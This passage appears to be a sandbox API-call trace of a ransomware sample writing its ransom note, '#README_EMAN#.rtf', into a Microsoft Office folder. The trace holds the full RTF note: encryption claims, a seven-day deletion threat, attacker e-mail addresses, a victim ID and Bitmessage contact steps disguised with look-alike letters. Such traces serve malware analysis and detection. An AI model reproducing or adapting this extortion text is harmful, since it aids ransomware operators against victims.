WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.090] CloseHandle (hObject=0x294) returned 1 [0269.091] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.091] GetLastError () returned 0x2 [0269.091] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.091] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.091] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.091] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n 